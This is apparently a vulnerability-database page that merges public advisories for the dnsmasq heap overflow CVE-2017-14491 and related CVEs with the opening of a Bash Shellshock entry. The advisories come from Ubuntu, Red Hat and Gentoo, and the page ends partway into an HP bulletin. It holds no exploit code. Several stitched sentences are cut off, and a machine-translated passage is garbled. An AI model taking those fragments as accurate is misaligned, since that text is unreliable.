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562 vulnerabilities found for linux by oracle
VAR-201710-1433
Vulnerability from variot - Updated: 2026-04-10 23:34Heap-based buffer overflow in dnsmasq before 2.78 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted DNS response. Dnsmasq versions 2.77 and earlier contains multiple vulnerabilities. dnsmasq Exists in a buffer error vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state.
Ubuntu Security Notice USN-3430-3 January 04, 2018
dnsmasq regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 ESM
Summary:
USN-3430-2 introduced regression in Dnsmasq.
Software Description: - dnsmasq: Small caching DNS proxy and DHCP/TFTP server
Details:
USN-3430-2 fixed several vulnerabilities. The update introduced a new regression that breaks DNS resolution. This update addresses the problem.
We apologize for the inconvenience.
Original advisory details:
Felix Wilhelm, Fermin J. Serna, Gabriel Campana and Kevin Hamacher discovered that Dnsmasq incorrectly handled DNS requests. (CVE-2017-14491)
Felix Wilhelm, Fermin J. (CVE-2017-14492)
Felix Wilhelm, Fermin J. Serna, Gabriel Campana and Kevin Hamacher discovered that Dnsmasq incorrectly handled DHCPv6 requests. (CVE-2017-14493)
Felix Wilhelm, Fermin J. Serna, Gabriel Campana and Kevin Hamacher discovered that Dnsmasq incorrectly handled DHCPv6 packets. (CVE-2017-14494)
Felix Wilhelm, Fermin J. Serna, Gabriel Campana and Kevin Hamacher discovered that Dnsmasq incorrectly handled DNS requests. A remote attacker could use this issue to cause Dnsmasq to consume memory, resulting in a denial of service. (CVE-2017-14495)
Felix Wilhelm, Fermin J. Serna, Gabriel Campana and Kevin Hamacher discovered that Dnsmasq incorrectly handled DNS requests. (CVE-2017-14496)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 ESM: dnsmasq=C2=A02.59-4ubuntu0.4 dnsmasq-base2.59-4ubuntu0.4 dnsmasq-utils2.59-4ubuntu0.4
After a standard system update you need to reboot your computer to make all the necessary changes. 7.3) - ppc64, ppc64le, s390x, x86_64
-
This issue only affected configurations using one of these options: enable-ra, ra-only, slaac, ra-names, ra-advrouter, or ra-stateless. (CVE-2017-14493)
-
An information leak was found in dnsmasq in the DHCPv6 relay code. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: dnsmasq security update Advisory ID: RHSA-2017:2839-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2017:2839 Issue date: 2017-10-02 CVE Names: CVE-2017-14491 =====================================================================
- Summary:
An update for dnsmasq is now available for Red Hat Enterprise Linux 6.2 Advanced Update Support, Red Hat Enterprise Linux 6.4 Advanced Update Support, Red Hat Enterprise Linux 6.5 Advanced Update Support, Red Hat Enterprise Linux 6.5 Telco Extended Update Support, Red Hat Enterprise Linux 6.6 Advanced Update Support, Red Hat Enterprise Linux 6.6 Telco Extended Update Support, and Red Hat Enterprise Linux 6.7 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux HPC Node EUS (v. 6.7) - x86_64 Red Hat Enterprise Linux HPC Node Optional EUS (v. 6.7) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.2) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.4) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server EUS (v. 6.7) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.4) - x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 6.7) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server TUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server TUS (v. 6.6) - x86_64
- Description:
The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.
Security Fix(es):
- A heap buffer overflow was found in dnsmasq in the code responsible for building DNS replies. (CVE-2017-14491)
Red Hat would like to thank Felix Wilhelm (Google Security Team), Fermin J. Serna (Google Security Team), Gabriel Campana (Google Security Team), Kevin Hamacher (Google Security Team), and Ron Bowes (Google Security Team) for reporting this issue.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1495409 - CVE-2017-14491 dnsmasq: heap overflow in the code responsible for building DNS replies
- Package List:
Red Hat Enterprise Linux HPC Node EUS (v. 6.7):
Source: dnsmasq-2.48-16.el6_7.1.src.rpm
x86_64: dnsmasq-2.48-16.el6_7.1.x86_64.rpm dnsmasq-debuginfo-2.48-16.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional EUS (v. 6.7):
x86_64: dnsmasq-debuginfo-2.48-16.el6_7.1.x86_64.rpm dnsmasq-utils-2.48-16.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Server AUS (v. 6.2):
Source: dnsmasq-2.48-5.el6_2.2.src.rpm
x86_64: dnsmasq-2.48-5.el6_2.2.x86_64.rpm dnsmasq-debuginfo-2.48-5.el6_2.2.x86_64.rpm
Red Hat Enterprise Linux Server AUS (v. 6.4):
Source: dnsmasq-2.48-13.el6_4.1.src.rpm
x86_64: dnsmasq-2.48-13.el6_4.1.x86_64.rpm dnsmasq-debuginfo-2.48-13.el6_4.1.x86_64.rpm
Red Hat Enterprise Linux Server AUS (v. 6.5):
Source: dnsmasq-2.48-13.el6_5.1.src.rpm
x86_64: dnsmasq-2.48-13.el6_5.1.x86_64.rpm dnsmasq-debuginfo-2.48-13.el6_5.1.x86_64.rpm
Red Hat Enterprise Linux Server TUS (v. 6.5):
Source: dnsmasq-2.48-13.el6_5.1.src.rpm
x86_64: dnsmasq-2.48-13.el6_5.1.x86_64.rpm dnsmasq-debuginfo-2.48-13.el6_5.1.x86_64.rpm
Red Hat Enterprise Linux Server AUS (v. 6.6):
Source: dnsmasq-2.48-14.el6_6.1.src.rpm
x86_64: dnsmasq-2.48-14.el6_6.1.x86_64.rpm dnsmasq-debuginfo-2.48-14.el6_6.1.x86_64.rpm
Red Hat Enterprise Linux Server TUS (v. 6.6):
Source: dnsmasq-2.48-14.el6_6.1.src.rpm
x86_64: dnsmasq-2.48-14.el6_6.1.x86_64.rpm dnsmasq-debuginfo-2.48-14.el6_6.1.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 6.7):
Source: dnsmasq-2.48-16.el6_7.1.src.rpm
i386: dnsmasq-2.48-16.el6_7.1.i686.rpm dnsmasq-debuginfo-2.48-16.el6_7.1.i686.rpm
ppc64: dnsmasq-2.48-16.el6_7.1.ppc64.rpm dnsmasq-debuginfo-2.48-16.el6_7.1.ppc64.rpm
s390x: dnsmasq-2.48-16.el6_7.1.s390x.rpm dnsmasq-debuginfo-2.48-16.el6_7.1.s390x.rpm
x86_64: dnsmasq-2.48-16.el6_7.1.x86_64.rpm dnsmasq-debuginfo-2.48-16.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.4):
Source: dnsmasq-2.48-13.el6_4.1.src.rpm
x86_64: dnsmasq-debuginfo-2.48-13.el6_4.1.x86_64.rpm dnsmasq-utils-2.48-13.el6_4.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.5):
Source: dnsmasq-2.48-13.el6_5.1.src.rpm
x86_64: dnsmasq-debuginfo-2.48-13.el6_5.1.x86_64.rpm dnsmasq-utils-2.48-13.el6_5.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional TUS (v. 6.5):
Source: dnsmasq-2.48-13.el6_5.1.src.rpm
x86_64: dnsmasq-debuginfo-2.48-13.el6_5.1.x86_64.rpm dnsmasq-utils-2.48-13.el6_5.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.6):
x86_64: dnsmasq-debuginfo-2.48-14.el6_6.1.x86_64.rpm dnsmasq-utils-2.48-14.el6_6.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional TUS (v. 6.6):
x86_64: dnsmasq-debuginfo-2.48-14.el6_6.1.x86_64.rpm dnsmasq-utils-2.48-14.el6_6.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 6.7):
i386: dnsmasq-debuginfo-2.48-16.el6_7.1.i686.rpm dnsmasq-utils-2.48-16.el6_7.1.i686.rpm
ppc64: dnsmasq-debuginfo-2.48-16.el6_7.1.ppc64.rpm dnsmasq-utils-2.48-16.el6_7.1.ppc64.rpm
s390x: dnsmasq-debuginfo-2.48-16.el6_7.1.s390x.rpm dnsmasq-utils-2.48-16.el6_7.1.s390x.rpm
x86_64: dnsmasq-debuginfo-2.48-16.el6_7.1.x86_64.rpm dnsmasq-utils-2.48-16.el6_7.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2017-14491 https://access.redhat.com/security/updates/classification/#critical https://access.redhat.com/security/vulnerabilities/3199382
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201710-27
https://security.gentoo.org/
Severity: Normal Title: Dnsmasq: Multiple vulnerabilities Date: October 23, 2017 Bugs: #632692 ID: 201710-27
Synopsis
Multiple vulnerabilities have been found in Dnsmasq, the worst of which may allow remote attackers to execute arbitrary code.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-dns/dnsmasq < 2.78 >= 2.78
Description
Multiple vulnerabilities have been discovered in Dnsmasq.
Workaround
There is no known workaround at this time.
Resolution
All Dnsmasq users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-dns/dnsmasq-2.78"
References
[ 1 ] CVE-2017-14491 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-14491 [ 2 ] CVE-2017-14492 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-14492 [ 3 ] CVE-2017-14493 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-14493 [ 4 ] CVE-2017-14494 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-14494 [ 5 ] CVE-2017-14495 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-14495 [ 6 ] CVE-2017-14496 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-14496
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201710-27
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Show details on source website{
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"data": "Heap-based buffer overflow in dnsmasq before 2.78 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted DNS response. Dnsmasq versions 2.77 and earlier contains multiple vulnerabilities. dnsmasq Exists in a buffer error vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. \n===========================================================================\nUbuntu Security Notice USN-3430-3\nJanuary 04, 2018\n\ndnsmasq regression\n===========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 ESM\n\nSummary:\n\nUSN-3430-2 introduced regression in Dnsmasq. \n\nSoftware Description:\n- dnsmasq: Small caching DNS proxy and DHCP/TFTP server\n\nDetails:\n\nUSN-3430-2 fixed several vulnerabilities. The update introduced a new\nregression that breaks DNS resolution. This update addresses the\nproblem. \n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\nFelix Wilhelm, Fermin J. Serna, Gabriel Campana and Kevin Hamacher\ndiscovered that Dnsmasq incorrectly handled DNS requests. \n(CVE-2017-14491)\n\nFelix Wilhelm, Fermin J. (CVE-2017-14492)\n\nFelix Wilhelm, Fermin J. Serna, Gabriel Campana and Kevin Hamacher\ndiscovered that Dnsmasq incorrectly handled DHCPv6 requests. \n(CVE-2017-14493)\n\nFelix Wilhelm, Fermin J. Serna, Gabriel Campana and Kevin Hamacher\ndiscovered that Dnsmasq incorrectly handled DHCPv6 packets. (CVE-2017-14494)\n\nFelix Wilhelm, Fermin J. Serna, Gabriel Campana and Kevin Hamacher\ndiscovered that Dnsmasq incorrectly handled DNS requests. A remote\nattacker could use this issue to cause Dnsmasq to consume memory,\nresulting in a denial of service. (CVE-2017-14495)\n\nFelix Wilhelm, Fermin J. Serna, Gabriel Campana and Kevin Hamacher\ndiscovered that Dnsmasq incorrectly handled DNS requests. (CVE-2017-14496)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 ESM:\n dnsmasq=C2=A02.59-4ubuntu0.4\n dnsmasq-base2.59-4ubuntu0.4\n dnsmasq-utils2.59-4ubuntu0.4\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. 7.3) - ppc64, ppc64le, s390x, x86_64\n\n3. This issue only affected\nconfigurations using one of these options: enable-ra, ra-only, slaac,\nra-names, ra-advrouter, or ra-stateless. (CVE-2017-14493)\n\n* An information leak was found in dnsmasq in the DHCPv6 relay code. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: dnsmasq security update\nAdvisory ID: RHSA-2017:2839-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2017:2839\nIssue date: 2017-10-02\nCVE Names: CVE-2017-14491 \n=====================================================================\n\n1. Summary:\n\nAn update for dnsmasq is now available for Red Hat Enterprise Linux 6.2\nAdvanced Update Support, Red Hat Enterprise Linux 6.4 Advanced Update\nSupport, Red Hat Enterprise Linux 6.5 Advanced Update Support, Red Hat\nEnterprise Linux 6.5 Telco Extended Update Support, Red Hat Enterprise\nLinux 6.6 Advanced Update Support, Red Hat Enterprise Linux 6.6 Telco\nExtended Update Support, and Red Hat Enterprise Linux 6.7 Extended Update\nSupport. \n\nRed Hat Product Security has rated this update as having a security impact\nof Critical. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux HPC Node EUS (v. 6.7) - x86_64\nRed Hat Enterprise Linux HPC Node Optional EUS (v. 6.7) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.2) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 6.7) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 6.7) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 6.6) - x86_64\n\n3. Description:\n\nThe dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name\nServer) forwarder and DHCP (Dynamic Host Configuration Protocol) server. \n\nSecurity Fix(es):\n\n* A heap buffer overflow was found in dnsmasq in the code responsible for\nbuilding DNS replies. \n(CVE-2017-14491)\n\nRed Hat would like to thank Felix Wilhelm (Google Security Team), Fermin J. \nSerna (Google Security Team), Gabriel Campana (Google Security Team), Kevin\nHamacher (Google Security Team), and Ron Bowes (Google Security Team) for\nreporting this issue. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1495409 - CVE-2017-14491 dnsmasq: heap overflow in the code responsible for building DNS replies\n\n6. Package List:\n\nRed Hat Enterprise Linux HPC Node EUS (v. 6.7):\n\nSource:\ndnsmasq-2.48-16.el6_7.1.src.rpm\n\nx86_64:\ndnsmasq-2.48-16.el6_7.1.x86_64.rpm\ndnsmasq-debuginfo-2.48-16.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional EUS (v. 6.7):\n\nx86_64:\ndnsmasq-debuginfo-2.48-16.el6_7.1.x86_64.rpm\ndnsmasq-utils-2.48-16.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.2):\n\nSource:\ndnsmasq-2.48-5.el6_2.2.src.rpm\n\nx86_64:\ndnsmasq-2.48-5.el6_2.2.x86_64.rpm\ndnsmasq-debuginfo-2.48-5.el6_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.4):\n\nSource:\ndnsmasq-2.48-13.el6_4.1.src.rpm\n\nx86_64:\ndnsmasq-2.48-13.el6_4.1.x86_64.rpm\ndnsmasq-debuginfo-2.48-13.el6_4.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.5):\n\nSource:\ndnsmasq-2.48-13.el6_5.1.src.rpm\n\nx86_64:\ndnsmasq-2.48-13.el6_5.1.x86_64.rpm\ndnsmasq-debuginfo-2.48-13.el6_5.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 6.5):\n\nSource:\ndnsmasq-2.48-13.el6_5.1.src.rpm\n\nx86_64:\ndnsmasq-2.48-13.el6_5.1.x86_64.rpm\ndnsmasq-debuginfo-2.48-13.el6_5.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.6):\n\nSource:\ndnsmasq-2.48-14.el6_6.1.src.rpm\n\nx86_64:\ndnsmasq-2.48-14.el6_6.1.x86_64.rpm\ndnsmasq-debuginfo-2.48-14.el6_6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 6.6):\n\nSource:\ndnsmasq-2.48-14.el6_6.1.src.rpm\n\nx86_64:\ndnsmasq-2.48-14.el6_6.1.x86_64.rpm\ndnsmasq-debuginfo-2.48-14.el6_6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 6.7):\n\nSource:\ndnsmasq-2.48-16.el6_7.1.src.rpm\n\ni386:\ndnsmasq-2.48-16.el6_7.1.i686.rpm\ndnsmasq-debuginfo-2.48-16.el6_7.1.i686.rpm\n\nppc64:\ndnsmasq-2.48-16.el6_7.1.ppc64.rpm\ndnsmasq-debuginfo-2.48-16.el6_7.1.ppc64.rpm\n\ns390x:\ndnsmasq-2.48-16.el6_7.1.s390x.rpm\ndnsmasq-debuginfo-2.48-16.el6_7.1.s390x.rpm\n\nx86_64:\ndnsmasq-2.48-16.el6_7.1.x86_64.rpm\ndnsmasq-debuginfo-2.48-16.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.4):\n\nSource:\ndnsmasq-2.48-13.el6_4.1.src.rpm\n\nx86_64:\ndnsmasq-debuginfo-2.48-13.el6_4.1.x86_64.rpm\ndnsmasq-utils-2.48-13.el6_4.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.5):\n\nSource:\ndnsmasq-2.48-13.el6_5.1.src.rpm\n\nx86_64:\ndnsmasq-debuginfo-2.48-13.el6_5.1.x86_64.rpm\ndnsmasq-utils-2.48-13.el6_5.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 6.5):\n\nSource:\ndnsmasq-2.48-13.el6_5.1.src.rpm\n\nx86_64:\ndnsmasq-debuginfo-2.48-13.el6_5.1.x86_64.rpm\ndnsmasq-utils-2.48-13.el6_5.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.6):\n\nx86_64:\ndnsmasq-debuginfo-2.48-14.el6_6.1.x86_64.rpm\ndnsmasq-utils-2.48-14.el6_6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 6.6):\n\nx86_64:\ndnsmasq-debuginfo-2.48-14.el6_6.1.x86_64.rpm\ndnsmasq-utils-2.48-14.el6_6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 6.7):\n\ni386:\ndnsmasq-debuginfo-2.48-16.el6_7.1.i686.rpm\ndnsmasq-utils-2.48-16.el6_7.1.i686.rpm\n\nppc64:\ndnsmasq-debuginfo-2.48-16.el6_7.1.ppc64.rpm\ndnsmasq-utils-2.48-16.el6_7.1.ppc64.rpm\n\ns390x:\ndnsmasq-debuginfo-2.48-16.el6_7.1.s390x.rpm\ndnsmasq-utils-2.48-16.el6_7.1.s390x.rpm\n\nx86_64:\ndnsmasq-debuginfo-2.48-16.el6_7.1.x86_64.rpm\ndnsmasq-utils-2.48-16.el6_7.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-14491\nhttps://access.redhat.com/security/updates/classification/#critical\nhttps://access.redhat.com/security/vulnerabilities/3199382\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2017 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFZ0nLUXlSAg2UNWIIRAn39AKDCsn16dEmmA7DazjU2IOpWLIFp8QCeODoG\n7t7GGwkabW2pC2Wcr35n/G8=\n=S/6b\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201710-27\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Dnsmasq: Multiple vulnerabilities\n Date: October 23, 2017\n Bugs: #632692\n ID: 201710-27\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Dnsmasq, the worst of which\nmay allow remote attackers to execute arbitrary code. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-dns/dnsmasq \u003c 2.78 \u003e= 2.78 \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Dnsmasq. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Dnsmasq users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-dns/dnsmasq-2.78\"\n\nReferences\n==========\n\n[ 1 ] CVE-2017-14491\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-14491\n[ 2 ] CVE-2017-14492\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-14492\n[ 3 ] CVE-2017-14493\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-14493\n[ 4 ] CVE-2017-14494\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-14494\n[ 5 ] CVE-2017-14495\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-14495\n[ 6 ] CVE-2017-14496\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-14496\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201710-27\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n",
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"db": "JVNDB",
"id": "JVNDB-2017-008618"
},
{
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"id": "CVE-2017-14491"
}
]
},
"sources": {
"_id": null,
"data": [
{
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{
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{
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{
"db": "PACKETSTORM",
"id": "144474",
"ident": null
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{
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{
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"id": "144469",
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{
"db": "PACKETSTORM",
"id": "144481",
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{
"db": "PACKETSTORM",
"id": "144482",
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{
"db": "PACKETSTORM",
"id": "144706",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "144472",
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},
{
"db": "CNNVD",
"id": "CNNVD-201709-747",
"ident": null
},
{
"db": "JVNDB",
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"ident": null
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{
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},
"sources_release_date": {
"_id": null,
"data": [
{
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"db": "CERT/CC",
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{
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"db": "VULMON",
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{
"date": "2018-01-04T17:50:40",
"db": "PACKETSTORM",
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{
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"db": "PACKETSTORM",
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{
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{
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"db": "PACKETSTORM",
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{
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{
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{
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"db": "NVD",
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{
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{
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{
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"db": "CNNVD",
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{
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"title": {
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VAR-201409-1155
Vulnerability from variot - Updated: 2026-04-10 23:30GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. QNAP Systems, Inc. Provided by QTS teeth, Turbo NAS for OS is. QTS for, GNU Bash Vulnerability (JVNVU#97219505) caused by OS Command injection vulnerability (CWE-78) Exists. This vulnerability information is based on the Information Security Early Warning Partnership. IPA Report to JPCERT/CC Coordinated with the developer. Reporter : University of Electro-Communications Wakisaka Yuki MrAny application permission OS The command may be executed. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. GNU Bash 3.2 and later are vulnerable; prior versions may also be affected.
This vulnerability allows users that have been granted access to a shell script to escalate privilege and execute unrestricted commands at the same security level as the Bash script. Customers who need to upgrade the firmware of their Superdome X or HP Converged System 900 for SAP HANA should contact HP Technical Support to obtain the firmware or plan to schedule an onsite visit with an HP Services field service professional.
NOTE: HP strongly recommends implementing the following security best practices to help reduce both known and future security vulnerability risks:
Isolate the HP Superdome X or HP Converged System 900 for SAP HANA's management network by keeping it separate from the data or production network, and not connecting it directly to the Internet without additional access authentication. Patch and maintain Lightweight Directory Access Protocol (LDAP) and web servers. Use virus scanners, intrusion detection/prevention systems (IDS/IPS), and vulnerability scanners regularly.
Additionally two out-of-bounds array accesses in the bash parser are fixed which were revealed in Red Hat's internal analysis for these issues and also independently reported by Todd Sabin.
For the stable distribution (wheezy), these problems have been fixed in version 4.2+dfsg-0.1+deb7u3. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04558068
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04558068 Version: 1
HPSBMU03246 rev.1 - HP Insight Control for Linux Central Management Server Pre-boot Execution Environment running Bash Shell, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-02-02 Last Updated: 2015-02-02
Potential Security Impact: Multiple vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Insight Control for Linux Central Management Server Pre-boot Execution Environment that could be exploited remotely resulting in Denial of Service (DoS), disclosure of information, and other vulnerabilities.
References:
CVE-2014-6271 CVE-2014-6277 CVE-2014-6278 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 CVE-2014-7196 SSRT101742
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control for Linux Central Management Server Pre-boot Execution Environment running Bash Shell
BACKGROUND
CVSS 2.0 Base Metrics
